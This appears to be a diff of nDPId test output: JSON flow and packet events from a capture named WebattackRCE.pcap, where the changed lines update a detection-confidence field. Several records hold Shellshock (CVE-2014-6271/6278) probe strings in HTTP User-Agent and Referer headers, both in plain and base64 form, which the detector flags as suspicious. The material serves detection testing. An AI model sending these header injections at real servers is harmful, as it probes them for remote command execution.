00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":485,"flow_packet_id":1,"flow_last_seen":1576420277451,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1576420277451,"pkt":"AAAAAAAAAAAAAAAACABFAAEFPsFAAEAG\/S9\/AAABfwAAAcVkH5CmDwZuBlGlyYAYAED++QAAAQEICp1m\/fOdZv3zR0VUIC90ZXN0IEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01152{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":485,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277451,"flow_last_seen":1576420277451,"flow_idle_time":7580000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277451,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50532,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01152{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":485,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277451,"flow_last_seen":1576420277451,"flow_idle_time":7580000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277451,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50532,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":486,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277452,"flow_last_seen":1576420277452,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277452,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50534,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":486,"flow_packet_id":1,"flow_last_seen":1576420277452,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277452,"pkt":"AAAAAAAAAAAAAAAACABFAAEJ+UlAAEAGQqN\/AAABfwAAAcVmH5C1jMGV60p+W4AYAED+\/QAAAQEICp1m\/fSdZv30R0VUIC90ZXN0LWNnaSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":486,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277452,"flow_last_seen":1576420277452,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277452,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50534,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test-cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":486,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277452,"flow_last_seen":1576420277452,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277452,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50534,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test-cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":487,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277454,"flow_last_seen":1576420277454,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277454,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50536,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":487,"flow_packet_id":1,"flow_last_seen":1576420277454,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277454,"pkt":"AAAAAAAAAAAAAAAACABFAAEJpZBAAEAGllx\/AAABfwAAAcVoH5CGpZ1eF0nj7YAYAED+\/QAAAQEICp1m\/fadZv32R0VUIC90ZXN0LmNnaSBIVFRQLzEuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":487,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277454,"flow_last_seen":1576420277454,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277454,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50536,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":487,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277454,"flow_last_seen":1576420277454,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277454,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50536,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":488,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277455,"flow_last_seen":1576420277455,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277455,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50538,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":488,"flow_packet_id":1,"flow_last_seen":1576420277455,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277455,"pkt":"AAAAAAAAAAAAAAAACABFAAENkNNAAEAGqxV\/AAABfwAAAcVqH5AR5agGdIx514AYAED\/AQAAAQEICp1m\/fedZv33R0VUIC90ZXN0X2NnaS5waHAgSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":488,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277455,"flow_last_seen":1576420277455,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277455,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50538,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test_cgi.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":488,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277455,"flow_last_seen":1576420277455,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277455,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50538,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test_cgi.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":489,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277458,"flow_last_seen":1576420277458,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277458,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50540,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":489,"flow_packet_id":1,"flow_last_seen":1576420277458,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277458,"pkt":"AAAAAAAAAAAAAAAACABFAAENOM9AAEAGAxp\/AAABfwAAAcVsH5CGwwAaI+XJXIAYAED\/AQAAAQEICp1m\/fqdZv36R0VUIC90ZXN0LmNnaS5waHAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":489,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277458,"flow_last_seen":1576420277458,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277458,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50540,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.cgi.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":489,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277458,"flow_last_seen":1576420277458,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277458,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50540,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.cgi.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":490,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277459,"flow_last_seen":1576420277459,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277459,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50542,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":490,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":490,"flow_packet_id":1,"flow_last_seen":1576420277459,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277459,"pkt":"AAAAAAAAAAAAAAAACABFAAEMfPpAAEAGvu9\/AAABfwAAAcVuH5CbL0QudOlGT4AYAED\/AAAAAQEICp1m\/fudZv37R0VUIC90ZXN0X2NnaS5wbCBIVFRQLzEuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":490,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277459,"flow_last_seen":1576420277459,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277459,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50542,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test_cgi.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":490,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277459,"flow_last_seen":1576420277459,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277459,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50542,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test_cgi.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":491,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277460,"flow_last_seen":1576420277460,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277460,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50544,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":491,"flow_packet_id":1,"flow_last_seen":1576420277460,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277460,"pkt":"AAAAAAAAAAAAAAAACABFAAEMyD1AAEAGc6x\/AAABfwAAAcVwH5BPvfDvcLTsqIAYAED\/AAAAAQEICp1m\/fydZv38R0VUIC90ZXN0LWNnaS5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":491,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277460,"flow_last_seen":1576420277460,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277460,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50544,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test-cgi.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":491,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277460,"flow_last_seen":1576420277460,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277460,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50544,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test-cgi.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":492,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277462,"flow_last_seen":1576420277462,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277462,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50546,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 